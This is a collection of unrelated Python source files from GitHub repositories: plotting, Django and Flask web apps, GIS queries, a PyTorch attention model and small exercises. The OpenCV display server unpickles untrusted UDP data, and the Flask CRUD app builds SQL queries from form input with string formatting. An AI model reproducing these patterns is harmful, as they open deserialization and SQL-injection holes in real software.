1])\r\n\r\npairs = [corners[np.roll(range(3), -i)[1:]] for i in range(3)]\r\n# The area of the triangle formed by point xy and another pair or points\r\ntri_area = lambda xy, pair: 0.5 * np.linalg.norm(np.cross(*(pair - xy)))\r\n\r\ndef xy2bc(xy, tol=1.e-4):\r\n    '''Converts 2D Cartesian coordinates to barycentric.'''\r\n    coords = np.array([tri_area(xy, p) for p in pairs]) / AREA\r\n    return np.clip(coords, tol, 1.0 - tol)\r\n\r\ndef trimesh_coords_to_bucket_counts(trimesh, X):\r\n    bucket_values_to_coord = {tuple(np.round(xy2bc(xy) * 16).astype(int)): xy for xy in zip(trimesh.x, trimesh.y)}\r\n    coord_to_counts = defaultdict(int)\r\n    for x in X:\r\n        coord = bucket_values_to_coord[tuple(x)]\r\n        coord_to_counts[coord] += 1\r\n    counts = [coord_to_counts[xy] for xy in zip(trimesh.x, trimesh.y)]\r\n    return counts\r\n\r\ndef plot_simplex():\r\n    refiner = tri.UniformTriRefiner(triangle)\r\n    trimesh = refiner.refine_triangulation(subdiv=4)\r\n\r\n    fig, axes = plt.subplots(ncols=2, figsize=(16,7.1))\r\n    axes = axes.ravel()\r\n    for ax in axes:\r\n        ax.axis('off')\r\n    axes[0].triplot(trimesh, linewidth=1, color='darkgray')\r\n    axes[1].triplot(trimesh, linewidth=1, color='darkgray')\r\n    axes[1].set_title('Trinomial(n=16, β=[0.25, 0.5, 0.25])')\r\n    \r\n    tick_spacement = 1/16\r\n    height = 0.75**0.5\r\n    \r\n    ax = axes[0]\r\n    \r\n    ax.text(-0.18, -0.12, 'X1', size=20)\r\n    tick_x = 0\r\n    tick_y = 0\r\n    for i in range(17):\r\n        if i % 2 == 0:\r\n            ax.text(tick_x - 0.02, tick_y + 0.02, str(16-i), size=12)\r\n        tick_x += height**2/16\r\n        tick_y += 0.5*height/16\r\n\r\n    dim_l1 = lines.Line2D([height**2, -0.07], [0.5*height, -0.04], linestyle='-', color='darkgray')\r\n    ax.add_line(dim_l1)\r\n    ax.scatter([-0.07], [-0.04], marker=(3, 0, 0), s=80, color='darkgray')\r\n    \r\n    # X2 axis\r\n    ax.text(0.465, 1.04, 'X2', size=20)\r\n    tick_y = 0\r\n    for i in range(17):\r\n        if i % 2 == 0:\r\n            ax.text(0.51, tick_y + 0.01, str(i), size=12)\r\n        tick_y += height/16\r\n    \r\n    dim_l2 = lines.Line2D([0.5, 0.5], [0, 0.98], linestyle='-', color='darkgray')\r\n    ax.add_line(dim_l2)\r\n    ax.scatter([0.498], [0.98], marker=(3, 0, 0), s=80, color='darkgray')\r\n\r\n    # X3 axis\r\n    ax.text(1.14, -0.12, 'X3', size=20)\r\n\r\n    tick_x = 0.25\r\n    tick_y = height/2\r\n    for i in range(17):\r\n        if i % 2 == 0:\r\n            ax.text(tick_x + 0.01, tick_y + 0.01, str(i), size=12)\r\n        tick_x += height**2/16\r\n        tick_y -= 0.5*height/16\r\n\r\n    dim_l3 = lines.Line2D([0.25, 1.1], [height/2, -(0.08/2**0.5)], linestyle='-', color='darkgray')\r\n    ax.add_line(dim_l3)\r\n    ax.scatter([1.1], [-(0.08/2**0.5)], marker=(3, 0, 0), s=80, color='darkgray')\r\n\r\n\r\n    return 
trimesh\r\n \r\ndef plot_trinomial(trimesh, x, color, n=None):\r\n n = n if n is not None else x.sum()\r\n counts = trimesh_coords_to_bucket_counts(trimesh, x)\r\n plt.scatter(x=trimesh.x, y=trimesh.y, color=color, \r\n zorder=100,\r\n s=(np.array(counts) / n)*100000)\r\n\r\ndef plot_trinomials(X, colors):\r\n trimesh = plot_simplex()\r\n n = np.sum([x.sum() for x in X])\r\n for x, color in zip(X, colors):\r\n plot_trinomial(trimesh, x, color, n)\r\n\r\ndef make_dataset(n, alpha, beta):\r\n xs = []\r\n for k, alpha_k in enumerate(alpha):\r\n n_k = int(n * alpha_k)\r\n x = multinomial.rvs(n=16, p=beta[k], size=n_k)\r\n xs.append(x)\r\n return xs\r\n\r\nalpha = [1/3]\r\nbeta = np.array([[0.25, 0.25, 0.5]])\r\nX = make_dataset(10000, alpha, beta)\r\ncolors = ['coral']\r\n\r\nplot_trinomials(X, colors)\r\nplt.scatter([0.5], [((0.75**0.5)*0.5)], marker='*', s=100, color='red', zorder=100)\r\n\r\ndef plot_simplex():\r\n refiner = tri.UniformTriRefiner(triangle)\r\n trimesh = refiner.refine_triangulation(subdiv=4)\r\n\r\n fig, ax = plt.subplots(figsize=(8,7.1))\r\n ax.axis('off')\r\n plt.triplot(trimesh, linewidth=1, color='darkgray')\r\n \r\n ax.text(-0.09, -0.06, 'X1', size=20)\r\n ax.text(0.465, 0.9, 'X2', size=20)\r\n ax.text(1.07, -0.06, 'X3', size=20)\r\n \r\n tick_spacement = 1/16\r\n\r\n return trimesh\r\n\r\nalpha = [1/3]\r\nbeta = np.array([[0.25, 0.25, 0.5]])\r\nX = make_dataset(10000, alpha, beta)\r\ncolors = ['coral']\r\n\r\nplot_trinomials(X, colors)\r\nplt.scatter([0.5], [((0.75**0.5)*0.5)], marker='*', s=100, color='red', zorder=100)\r\n\r\ndef plot_em_run(likelihoods, ax):\r\n Ks = list(range(2, len(likelihoods) + 2))\r\n ax.scatter(Ks, likelihoods)\r\n ax.set_title('Likelihood by values of K')\r\n ax.set_ylabel('Likelihood')\r\n ax.set_xticks(Ks)\r\n ax.set_xticklabels(Ks)\r\n ax.set_xlabel('K')\r\n\r\ndef plot_simplex(ax):\r\n refiner = tri.UniformTriRefiner(triangle)\r\n trimesh = refiner.refine_triangulation(subdiv=4)\r\n\r\n ax.triplot(trimesh, linewidth=1, color='darkgray')\r\n ax.axis('off')\r\n \r\n ax.text(-0.09, -0.06, 'X1', size=20)\r\n ax.text(0.465, 0.9, 'X2', size=20)\r\n ax.text(1.07, -0.06, 'X3', size=20)\r\n \r\n tick_spacement = 1/16\r\n\r\n return trimesh\r\n\r\ndef plot_trinomial(trimesh, x, color, ax, z, n=None):\r\n n = n if n is not None else x.sum()\r\n counts = trimesh_coords_to_bucket_counts(trimesh, x)\r\n ax.scatter(x=trimesh.x, y=trimesh.y, color=color, \r\n zorder=z,\r\n s=(np.array(counts) / n)*100000)\r\n\r\ndef plot_trinomials(X, colors, ax):\r\n trimesh = plot_simplex(ax)\r\n n = np.sum([x.sum() for x in X])\r\n z=100\r\n for x, color in zip(X, colors):\r\n plot_trinomial(trimesh, x, color, ax, z, n)\r\n z -= 1\r\n\r\ndef make_dataset(n, alpha, beta):\r\n xs = []\r\n for k, alpha_k in enumerate(alpha):\r\n n_k = int(n * alpha_k)\r\n x = multinomial.rvs(n=16, p=beta[k], size=n_k)\r\n xs.append(x)\r\n return xs\r\n\r\nalpha = [0.1, 0.1, 0.8]\r\nbeta = np.array([[0.1, 0.1, 0.8], \r\n [0.1, 0.8, 0.1], \r\n [0.8, 0.1, 0.1]])\r\nX = make_dataset(10000, alpha, beta)\r\ncolors = ('coral', 'forestgreen', 'purple')\r\n\r\nlikelihoods, bics, icl_bics, best_alpha, best_beta, best_gamma = run_em(X, criterion='bic')\r\n\r\nfig, axes = plt.subplots(ncols=2, figsize=(16, 7.1))\r\naxes = axes.ravel()\r\nplot_trinomials(X, colors, axes[0])\r\nplot_em_run(likelihoods, 
axes[1])\r\n","repo_name":"pedroafleite/instacart-market-basket-analysis","sub_path":"instacart_modelling.py","file_name":"instacart_modelling.py","file_ext":"py","file_size_in_byte":20475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"30592844137","text":"import cv2, pickle, socket, os\n\n# https://medium.com/nerd-for-tech/live-streaming-using-opencv-c0ef28a5e497\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nserver_ip = \"127.0.0.1\"\nserver_port = 6655\n\nprint(f\"Binding server at {server_ip}:{server_port}\")\n\ns.bind((server_ip, server_port))\n\n\nwhile True:\n read_socket = s.recvfrom(1000000)\n\n pusher_ip = read_socket[1][0]\n img_data_raw = read_socket[0]\n\n img_data = pickle.loads(img_data_raw)\n\n print(f\"Received data from {pusher_ip}: {img_data}\")\n\n\n\n img = cv2.imdecode(img_data, cv2.IMREAD_COLOR)\n cv2.imshow(\"DroneDisplay\", img)\n\n if cv2.waitKey(10) == 13:\n break\n\ncv2.destroyAllWindows()\n\n\n","repo_name":"gronnmann/LineFollower","sub_path":"cv_display_server.py","file_name":"cv_display_server.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21390590682","text":"import unittest\nfrom unittest.mock import MagicMock, patch\n\nfrom videos_api.utils import get_video_info\n\n\nclass TestGetVideo(unittest.TestCase):\n def setUp(self) -> None:\n self.url = \"http://testing.com/\"\n return super().setUp()\n\n def test_get_video_info_success(self):\n response_mock = MagicMock()\n response_mock.status_code = 200\n video_info = {\"video_name\": \"Testing video\"}\n response_mock.json = MagicMock(return_value=[video_info])\n\n with patch(\"requests.get\", return_value=response_mock):\n frame_data = get_video_info(self.url)\n\n self.assertEqual(frame_data, video_info)\n self.assertIsInstance(frame_data, dict)\n\n def test_get_video_info_failure(self):\n response_mock = MagicMock()\n response_mock.status_code = 400\n\n with patch(\"requests.get\", return_value=response_mock):\n frame_data = get_video_info(self.url)\n\n self.assertIsNone(frame_data)\n","repo_name":"amssdias/telegram-bot","sub_path":"tests/videos_api/test_get_video.py","file_name":"test_get_video.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70063476646","text":"from django.http import JsonResponse\nfrom django.shortcuts import get_object_or_404, render\n\nfrom .models import Category, Size, Product\n\n\ndef categories_list(request, category_slug=None):\n category = get_object_or_404(Category, slug=category_slug)\n products = Product.objects.filter(category__in=Category.objects.get(slug=category_slug).get_descendants(include_self=True))\n return render(request, 'store/category.html', {'category': category, 'products': products})\n\ndef products_all(request):\n products = Product.objects.prefetch_related(\"product_image\").filter(in_stock=True)\n return render(request, 'store/home.html', {'products': products})\n\ndef product_info(request, slug):\n product = get_object_or_404(Product, \n slug=slug, \n in_stock=True\n )\n sizes = Size.objects.filter(\n product=product, in_stock=True\n )\n \n return render(request, 'store/product_info.html', {'product': product, 'sizes': sizes})\n\ndef get_quantities(request):\n size = request.GET.get('size')\n quantities = list(Size.objects.filter(prod_size=size).values(\"quantity\"))\n 
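    # Added note (not part of the original view): .values("quantity") returns
    # dicts, so `quantities` looks like [{"quantity": 3}, {"quantity": 5}, ...].
    # A flat list of numbers could be built instead with
    # Size.objects.filter(prod_size=size).values_list("quantity", flat=True).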
response_data = {\n \"quantities\": quantities\n }\n return JsonResponse(response_data)\n\ndef about_info(request):\n return render(request, 'store/about_info.html')\n","repo_name":"elgizabbasov/kicksale","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"4251626990","text":"from osgeo import ogr # connection to geopackage\r\nimport os\r\nfrom qgis.PyQt.QtCore import QVariant # types for attributes in vector layers QVariant.String, QVariant.Int, QVariant.Double\r\n\r\nmyfolder=r'C:\\Users\\mlc\\Documents\\PyQGIS'\r\n# source auxiliary functions (instead of importing module)\r\nexec(open(os.path.join(myfolder,'scripts','auxiliary_functions.py').encode('utf-8')).read())\r\n\r\n#clear layer tree and canvas and creates instance of project\r\nmyproject,mycanvas = my_clean_project()\r\n\r\n# Constants and SQL queries\r\n# geopackage name\r\nfn = os.path.join(myfolder,'input','CascaisZoning.gpkg')\r\nmycrs=3763\r\n\r\n# Note: to list tables, useful to know the table name in the sql query\r\ngpkg_layers = [l.GetName() for l in ogr.Open(fn)]\r\n#print(gpkg_layers)\r\n\r\n# QUERY:\r\n# Determine how many features Roads has\r\nmyquery=\"SELECT COUNT(*) from Roads\"\r\nmyoutputdict={}\r\n\r\n# Determine which values Roads.roadType takes\r\nmyquery=\"SELECT DISTINCT Roads.roadType from Roads\"\r\nmyoutputdict={}\r\n\r\n# Determine Roads which Type is not 'P': returns geometry\r\nmyquery=\"SELECT roadType,Roads.geom FROM Roads WHERE NOT roadType='P' \"\r\nmyoutputdict={'roadType': QgsField('roadType',QVariant.String),'geom':'MULTILINESTRING'}\r\n\r\n# Join attribute tables (LandUse and LandUseTypes). No \"join clause\": equivalent to \"INNER JOIN\"\r\nmyselect= ' SELECT LandUse.codeUse, LandUseTypes.Use, LandUse.geom '\r\nmyfrom = ' FROM LandUse, LandUseTypes '\r\nmywhere= ' WHERE LandUse.codeUse=LandUseTypes.Code'\r\nmyquery= myselect+myfrom+mywhere\r\nmyoutputdict={'code':QgsField('code',QVariant.String), 'use':QgsField('use',QVariant.String),'geom':'MULTIPOLYGON'}\r\n\r\n################################################################ Open connection to geopackage\r\n# For info, if GPKG, use \"ogr\", if spatialite, use \"spatialite\"\r\nmd = QgsProviderRegistry.instance().providerMetadata(\"ogr\")\r\nconn = md.createConnection( fn, {})\r\n\r\n################################################################# Execute query\r\nresult = conn.executeSql(myquery) # returns list\r\n\r\n##################################################################Output result as new layer\r\nmylayer=create_layer_from_sql_spatial_result(result,myoutputdict,mycrs)\r\n\r\n# add mylayer to the project\r\nmyproject.addMapLayer(mylayer)\r\n","repo_name":"manuelcampagnolo/PyQGIS_2nd_edition","sub_path":"session_8_a_v2_Cascais_first_examples_SQL_queries_with_function.py","file_name":"session_8_a_v2_Cascais_first_examples_SQL_queries_with_function.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16381592795","text":"from flask import Flask, render_template, request, redirect, url_for, flash\nfrom flask_mysqldb import MySQL\n\n# initializations\napp = Flask(__name__)\n\n# Mysql Connection\napp.config['MYSQL_HOST'] = 'localhost' \napp.config['MYSQL_USER'] = 'root'\napp.config['MYSQL_PASSWORD'] = 'pass'\napp.config['MYSQL_DB'] = 'flaskcrud'\nmysql = MySQL(app)\n\n# 
settings\napp.secret_key = \"mysecretkey\"\n\n# routes\n@app.route('/')\ndef Index():\n    cur = mysql.connection.cursor()\n    cur.execute('SELECT * FROM Products')\n    data = cur.fetchall()\n    cur.close()\n    return render_template('index.html', contacts = data)\n\n@app.route('/add_contact', methods=['POST'])\ndef add_contact():\n    if request.method == 'POST':\n        nombre = request.form['Nombre']\n        unidad = request.form['Unidad_medida']\n        precio = request.form['Precio']\n        stock = request.form['Stock']\n        total= int(precio)* int(stock) \n        print(stock)\n        cur = mysql.connection.cursor()\n        cur.execute(\"INSERT INTO Products(nombre, unidad_medida, precio, stock,total) VALUES (%s,%s,%s,%s,%s)\", \n        (nombre, unidad, precio, stock, total))\n        mysql.connection.commit()\n        flash('Product Added successfully')\n        return redirect(url_for('Index'))\n\n@app.route('/edit/<id>', methods = ['POST', 'GET'])\ndef get_contact(id):\n    cur = mysql.connection.cursor()\n    cur.execute('SELECT * FROM Products WHERE id = %s', (id,))\n    data = cur.fetchall()\n    cur.close()\n    return render_template('edit-contact.html', contact = data[0])\n\n@app.route('/update/<id>', methods=['POST'])\ndef update_contact(id):\n    if request.method == 'POST':\n        nombre = request.form['Nombre']\n        unidad = request.form['Unidad_medida']\n        precio = request.form['Precio']\n        stock = request.form['Stock']\n        total= int(precio)* int(stock) \n        cur = mysql.connection.cursor()\n        cur.execute(\"\"\"\n            UPDATE Products SET nombre = %s,unidad_medida = %s,precio = %s,stock = %s,total =%s WHERE id = %s\n        \"\"\", (nombre, unidad, precio, stock, total, id))\n        flash('Contact Updated Successfully')\n        mysql.connection.commit()\n        return redirect(url_for('Index'))\n\n@app.route('/delete/<id>', methods = ['POST','GET'])\ndef delete_contact(id):\n    cur = mysql.connection.cursor()\n    cur.execute('SELECT stock FROM Products WHERE id={0}'.format(id))\n    data = cur.fetchall()\n    Contact = data[0]\n    if Contact[0] > 0:\n        print(\"Can't remove a product that still has stock\")\n    else:\n        cur.execute('DELETE FROM Products WHERE id = {0}'.format(id))\n        mysql.connection.commit()\n        flash('Contact Removed Successfully')\n    return redirect(url_for('Index'))\n\n@app.route('/search', methods = ['POST','GET'])\ndef search():\n    if request.method == 'POST':\n        nombre =request.form['Nombre']\n        nombre_formato='\"'+nombre+'\"'\n        print(nombre_formato)\n        cur = mysql.connection.cursor()\n        cur.execute('SELECT * FROM Products WHERE nombre= {0}'.format(nombre_formato))\n        data = cur.fetchall()\n        cur.close()\n        print(data)\n        return render_template('search.html', contact = data[0]) \n# starting the app\nif __name__ == \"__main__\":\n    app.run(port=3000, debug=True)\n","repo_name":"Hunteryellow22/prueba","sub_path":"crud_flask-main/App.py","file_name":"App.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
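# --- Added note (not part of the original App.py record above): the
# .format()-interpolated queries in delete_contact and search are open to SQL
# injection; the parameterised placeholder form already used elsewhere in the
# file is the safe pattern, e.g.:
#     cur.execute('DELETE FROM Products WHERE id = %s', (id,))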
Region\"].tolist()\n\n#Puts all the state abbreviation in the dictionary\nstatesD = {}\nfor x in states:\n if x in statesD:\n statesD[x] += 1\n else:\n statesD[x] = 1\n\n\n\n\n# Makes sure that the column heads are strings\nfor col in df.columns:\n df[col] = df[col].astype(str)\n\n#Sets the scale for colors on the map. Because this was for an open house\n#these colors are derivatives of the school colors.\nscl = [[0.0, \"rgb(162, 170, 173)\"],[0.000001, \"rgb(129, 149, 165)\"],[0.001, \"rgb(97, 129, 158)\"],\\\n [0.05, \"rgb(64, 108, 150)\"],[0.2, \"rgb(32, 88, 143)\"],[1.0, \"rgb(0, 68, 136)\"]]\n\n#Defines the map\ndata = [ dict(\n type=\"choropleth\",\n colorscale = scl,\n autocolorscale = False,\n locations = df[\"code\"],\n z = df[\"total students\"].astype(float),\n locationmode = \"USA-states\",\n marker = dict(\n line = dict (\n color = \"rgb(255,255,255)\",\n width = 2\n ) ),\n colorbar = dict(\n title = \"Families\")\n ) ]\n\n#Defines the layout\nlayout = dict(\n title = \"Where Everyone is From!\",\n geo = dict(\n scope=\"usa\",\n projection=dict( type=\"albers usa\" ),\n showlakes = True,\n lakecolor = \"rgb(255, 255, 255)\"),\n )\n\n#Makes the data readable by iplot and then exports it to Internet\nfig = dict( data=data, layout=layout )\npy.iplot( fig, filename=\"October 14th Open House\" )\n","repo_name":"davis-cook98/ClassWork","sub_path":"OpenHouse.py","file_name":"OpenHouse.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"34983418920","text":"from tkinter import *\nfrom tkinter import ttk\nimport locale\n\nlocale.setlocale(locale.LC_MONETARY, \"en_US.UTF-8\")\n\nwin = Tk()\n\ndataUser = {\n \"id\": {\n \"nombre\": \"Juan Daniel\",\n \"apellido\": \"Perez\",\n \"cc\":1005090349,\n \"saldo\": 1000000,\n \"clave\": 1234,\n \"cuenta\": \"Ahorros\",\n \"fecha creacion\": \"12/12/2020\",\n \"fecha modificacion\": \"12/12/2020\",\n \"estado\": \"Activo\",\n \"tipo\": \"Natural\",\n \"email\": \" daniel@gmail.com\",\n \"telefono\": 3003764571,\n \"direccion\": \"Calle 12 # 12 - 12\",\n \"ciudad\": \"Bogota\",\n \"pais\": \"Colombia\",\n \"genero\": \"Masculino\",\n \"fecha nacimiento\": \"12/12/1990\",\n \"edad\": 30,\n \"estado civil\": \"Soltero\",\n \"profesion\": \"Estudiante\",\n \"nivel educativo\": \"Universitario\",\n \"ocupacion\": \"Estudiante\",\n \"empresa\": \"Universidad Nacional\",\n \"cargo\": \"Estudiante\",\n \"ingresos\": 1000000,\n \"egresos\": 0,\n \n\n }\n}\n\nwin.resizable(0, 0)\nwin.title(\"Cajero Automatico \")\nopciones =[\"Nequi\", \"Bancolombia\", \"Daviviena\"]\nvalor_en_dolar_formateado = locale.currency(dataUser[\"id\"][\"saldo\"], grouping=True)\n\ncb1 = ttk.Combobox(win, values=opciones, width=10)\nprint(cb1.get())\ncb1.grid(row=1, column=1, padx=5, pady=5)\nwin.geometry(\"500x500\")\n\nwin.mainloop()\n\n","repo_name":"klayngo/tkinterPythonInterfaceBasic","sub_path":"usuario.py","file_name":"usuario.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"70759353124","text":"from operator import concat\nfrom tabnanny import verbose\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\nimport numpy as np\nclass ScaledDotProductAttention(nn.Module):\n \"\"\" Scaled Dot-Product Attention \"\"\"\n\n def __init__(self, scale):\n super().__init__()\n\n 
self.scale = scale\n        self.softmax = nn.Softmax(dim=2)\n\n    def forward(self, q, k, v, mask=None):\n        u = torch.bmm(q, k.transpose(1, 2)) # 1.Matmul\n        u = u / self.scale # 2.Scale\n\n        if mask is not None:\n            u = u.masked_fill(mask, -np.inf) # 3.Mask\n\n        attn = self.softmax(u) # 4.Softmax\n        output = torch.bmm(attn, v) # 5.Output\n\n        return attn, output\n\nclass MultiHeadAttention(nn.Module):\n    \"\"\" Multi-Head Attention \"\"\"\n\n    def __init__(self, n_head, d_k_, d_v_, d_k, d_v, d_o):\n        super().__init__()\n\n        self.n_head = n_head\n        self.d_k = d_k\n        self.d_v = d_v\n\n        self.fc_q = nn.Linear(d_k_, n_head * d_k)\n        self.fc_k = nn.Linear(d_k_, n_head * d_k)\n        self.fc_v = nn.Linear(d_v_, n_head * d_v)\n\n        self.attention = ScaledDotProductAttention(scale=np.power(d_k, 0.5))\n\n        self.fc_o = nn.Linear(n_head * d_v, d_o)\n\n    def forward(self, q, k, v, mask=None):\n\n        n_head, d_q, d_k, d_v = self.n_head, self.d_k, self.d_k, self.d_v\n\n        batch, n_q, d_q_ = q.size()\n        batch, n_k, d_k_ = k.size()\n        batch, n_v, d_v_ = v.size()\n\n        q = self.fc_q(q) # 1. project the single head into multiple heads\n        k = self.fc_k(k)\n        v = self.fc_v(v)\n        q = q.view(batch, n_q, n_head, d_q).permute(2, 0, 1, 3).contiguous().view(-1, n_q, d_q)\n        k = k.view(batch, n_k, n_head, d_k).permute(2, 0, 1, 3).contiguous().view(-1, n_k, d_k)\n        v = v.view(batch, n_v, n_head, d_v).permute(2, 0, 1, 3).contiguous().view(-1, n_v, d_v)\n\n        if mask is not None:\n            mask = mask.repeat(n_head, 1, 1)\n        attn, output = self.attention(q, k, v, mask=mask) # 2. compute the output as single-head attention over the flattened heads\n\n        output = output.view(n_head, batch, n_q, d_v).permute(1, 2, 0, 3).contiguous().view(batch, n_q, -1) # 3. Concat\n        output = self.fc_o(output) # 4. affine transform to get the final output\n\n        return attn, output\n\nclass SelfAttention(nn.Module):\n    \"\"\" Self-Attention \"\"\"\n\n    def __init__(self, n_head, d_k, d_v, d_x, d_o):\n        super().__init__()\n        self.wq = nn.Parameter(torch.Tensor(d_x, d_k))\n        self.wk = nn.Parameter(torch.Tensor(d_x, d_k))\n        self.wv = nn.Parameter(torch.Tensor(d_x, d_v))\n\n        self.mha = MultiHeadAttention(n_head=n_head, d_k_=d_k, d_v_=d_v, d_k=d_k, d_v=d_v, d_o=d_o)\n\n        self.init_parameters()\n\n    def init_parameters(self):\n        for param in self.parameters():\n            stdv = 1. / np.power(param.size(-1), 0.5)\n
            param.data.uniform_(-stdv, stdv)\n\n    def forward(self, x, mask=None):\n        q = torch.matmul(x, self.wq) \n        k = torch.matmul(x, self.wk)\n        v = torch.matmul(x, self.wv)\n\n        attn, output = self.mha(q, k, v, mask=mask)\n\n        return attn, output\n\n\n\nclass GRU_att(torch.nn.Module):\n    def __init__(self, args, vectors=None):\n        super(GRU_att, self).__init__()\n\n        # print(vectors.shape)\n        self.embedding = nn.Embedding(args.vocab_size+1, args.embedding_dim)\n        if vectors is not None:\n            vectors = np.row_stack((vectors, np.zeros(args.embedding_dim)))\n            self.embedding.weight.data.copy_(torch.Tensor(vectors))\n\n        self.args = args\n\n        self.name_length = args.name_max_text_len\n        self.desc_legnth = args.desc_max_text_len\n\n        self.hidden_dim = args.hidden_dim\n        self.gru_layers = args.lstm_layers\n        \n        self.name_bigru = nn.GRU(args.embedding_dim, self.hidden_dim // 2, num_layers=self.gru_layers, bidirectional=args.bidirectional, batch_first=True)\n        self.name_att = SelfAttention(n_head=args.attn_head, d_k=self.hidden_dim, d_v=self.hidden_dim // 2, d_x=self.hidden_dim, d_o=self.hidden_dim)\n\n        self.desc_bigru = nn.GRU(args.embedding_dim, self.hidden_dim // 2, num_layers=self.gru_layers, bidirectional=args.bidirectional, batch_first=True)\n        self.desc_att = SelfAttention(n_head=args.attn_head, d_k=self.hidden_dim, d_v=self.hidden_dim // 2, d_x=self.hidden_dim, d_o=self.hidden_dim)\n\n        self.fc1 = nn.Linear(self.hidden_dim * 2, self.hidden_dim)\n        self.fc2 = nn.Linear(self.hidden_dim, args.label_size)\n\n    def forward(self, name, name_length, desc, desc_length):\n        name = self.embedding(name)\n        name_pack = pack_padded_sequence(input=name, lengths=name_length, batch_first=True, enforce_sorted=False)\n        name, _ = self.name_bigru(name_pack)\n        name, _ = pad_packed_sequence(name, batch_first=True, total_length=self.name_length)\n        _, name = self.name_att(name)\n        name = torch.sum(name, dim=1)\n\n        desc = self.embedding(desc)\n        desc_pack = pack_padded_sequence(input=desc, lengths=desc_length, batch_first=True, enforce_sorted=False)\n        desc, _ = self.desc_bigru(desc_pack)\n        desc, _ = pad_packed_sequence(desc, batch_first=True, total_length=self.desc_legnth)\n        _, desc = self.desc_att(desc)\n        desc = torch.sum(desc, dim=1)\n\n        feat = torch.cat([name, desc], dim=1)\n        y = self.fc1(feat)\n        y = self.fc2(y)\n        return y","repo_name":"isharrisleung/App_classify","sub_path":"models/GRU_att.py","file_name":"GRU_att.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
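# --- Added sketch (not part of the dataset records above): a minimal shape
# check for the SelfAttention module defined in GRU_att.py, assuming the class
# is importable as written. All dimensions here are hypothetical.
import torch
from models.GRU_att import SelfAttention  # path as given in the record's sub_path

layer = SelfAttention(n_head=4, d_k=32, d_v=32, d_x=64, d_o=64)
x = torch.rand(2, 10, 64)             # (batch, seq_len, d_x)
attn, out = layer(x)
assert attn.shape == (4 * 2, 10, 10)  # one attention map per (head, batch) pair
assert out.shape == (2, 10, 64)       # (batch, seq_len, d_o)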
+{"seq_id":"29498963711","text":"import pandas as pd\nimport logging\n\nlogger = logging.getLogger(__name__)\nlog_level = logging.INFO\nlogging.basicConfig(level=log_level)\n\n\nclass BaseFanalytics:\n    \"\"\"\n    Class Variables:\n\n    self.years - the years to collect data\n    self.data - DataFrame with all data\n    \"\"\"\n    def __init__(self, years):\n        \"\"\"\n        :param years: an array of years to collect\n        \"\"\"\n        if type(years) is not list:\n            logger.error(f'years parameter must be an array')\n            exit(0)\n        self.years = years\n        self.data = pd.DataFrame()\n        self.parse_data()\n\n    def parse_data(self):\n        for year in self.years:\n            year_data = pd.read_csv(\n                'https://github.com/guga31bb/nflfastR-data/'\n                'blob/master/data/play_by_play_'\n                + str(year) + '.csv.gz?raw=True',\n                compression='gzip', low_memory=False)\n            # append this year's plays to the accumulated frame (the original\n            # appended self.data to itself, which duplicated rows instead)\n            self.data = self.data.append(year_data, sort=True)\n            self.data.reset_index(drop=True, inplace=True)\n\n    def _clean_data(self):\n        \"\"\"\n        operations to clean self.data\n\n        :return: None\n        \"\"\"\n        # ensure all 'pass' type plays are labeled pass\n        # and that all run plays are correctly labeled run\n        self.data.loc[self.data['pass'] == 1, 'play_type'] = 'pass'\n        self.data.loc[self.data['rush'] == 1, 'play_type'] = 'run'","repo_name":"KrisSoto/fanalytics","sub_path":"fanalytics/analytics.py","file_name":"analytics.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2016444210","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 22 20:53:32 2018\n\n@author: pineapple\n\"\"\"\n\n'''\nGiven a linked list, return the first node where the cycle begins. If there is no cycle, return null.\n\nNote: the given linked list must not be modified.\n\nFollow-up:\nCan you solve it without using extra space?\n'''\n\n'''\nBorrowed solution: time complexity O(n), space complexity O(1)\nIdea:\n\n     cycle length L ----* meeting point\n      |                 |\n      |                 |\n *-------*----  the entry is M steps before the meeting point (along the cycle)\n head  K  entry \n \nWhen the fast and slow pointers meet, the steps they have taken are:\nstep_slow = K + M\nstep_faster = K + M + n*L\nSince the fast pointer takes one extra step each time:\nstep_faster = 2 * step_slow\nFrom the three equations above we can derive\nK = (n-1)L + L - M\nSo, once fast and slow meet at the meeting point,\nstart a new pointer point at head and advance it together with the slow pointer, one step at a time;\nwhen point reaches the cycle entry, the slow pointer reaches it as well,\ni.e. the node where point == slow is the start of the cycle.\n'''\n\n# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution(object):\n    def detectCycle(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: ListNode\n        \"\"\"\n        if not head:\n            return\n        fast = head\n        slow = head\n        while fast and fast.next:\n            fast = fast.next.next\n            slow = slow.next\n            if fast == slow:\n                point = head\n                while point != slow:\n                    point = point.next\n                    slow = slow.next\n                return point\n        return 